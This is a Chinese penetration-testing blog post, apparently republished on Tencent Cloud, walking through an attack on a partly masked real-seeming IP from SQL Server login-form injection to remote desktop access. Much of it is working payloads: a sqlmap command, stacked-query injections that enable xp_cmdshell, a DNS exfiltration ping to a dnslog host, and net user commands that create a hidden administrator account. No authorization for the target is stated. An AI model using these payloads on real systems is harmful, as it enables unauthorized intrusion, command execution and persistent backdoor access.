前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
社区首页 >专栏 >从 SQL Server 注入到 远程连接桌面

从 SQL Server 注入到 远程连接桌面

作者头像
重生信息安全
发布2020-03-06 15:10:36
发布2020-03-06 15:10:36
1.7K00
代码可运行
举报
文章被收录于专栏:重生信息安全重生信息安全
运行总次数:0
代码可运行

0x00 目标情况

简单看了下登陆框,可以爆破用户名

加单引号后报错,试了试 and 1=1 确实存在注入

0x01 进一步测试

尝试得到数据版本: admin' and @@version=1--

抓包 sqlmap 跑了下发现不行: sqlmap -r 1.txt --risk 3 --level 3 --dbms "Microsoft SQL Server" --second-order "http://123.xxx.xxx.180:2001/error.aspx"

返回: all tested parameters appear to be not injectable,跑不出来,只能手工了

看下能不能多语句执行: admin';select convert(int,(select user));--

结果发现可以执行成功,能进行多语句执行

0x02 尝试多语句执行添加用户

  • 查看是否有 xp_cmdshell Payload:admin';if(1=(select count(*) from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell')) WAITFOR DELAY '0:0:5';--
  • 开启 xp_cmdshell Payload:admin';EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;--
  • 查看 whoami Payload:admin';exec master..xp_cmdshell 'ping %USERNAME%.vxxxx9.ceye.io';-- 在 dnslog 可以看到是 SYSTEM 权限,可以直接添加用户
  • 添加用户 看了下端口,3389开着
代码语言:javascript
代码运行次数:0
运行
复制
➜  sudo nmap -sS -Pn -n -p3389 123.xxx.xxx.180
Password:
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-25 09:30 CST
Nmap scan report for 123.xxx.xxx.180
Host is up.

PORT     STATE    SERVICE
3389/tcp open     ms-wbt-server

Nmap done: 1 IP address (1 host up) scanned in 2.07 seconds

直接添加用户: admin';exec master..xp_cmdshell 'net user Guest1 Aa123456. /add & net localgroup administrators Guest1 /add & net user Guest1 /active:yes'--

尝试登陆

参考链接:http://wyb0.com/posts/2019/sql-server-from-sql-injection-to-remote-conn-desktop/

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2019-09-30,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 重生信息安全 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 0x00 目标情况
  • 0x01 进一步测试
  • 0x02 尝试多语句执行添加用户
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档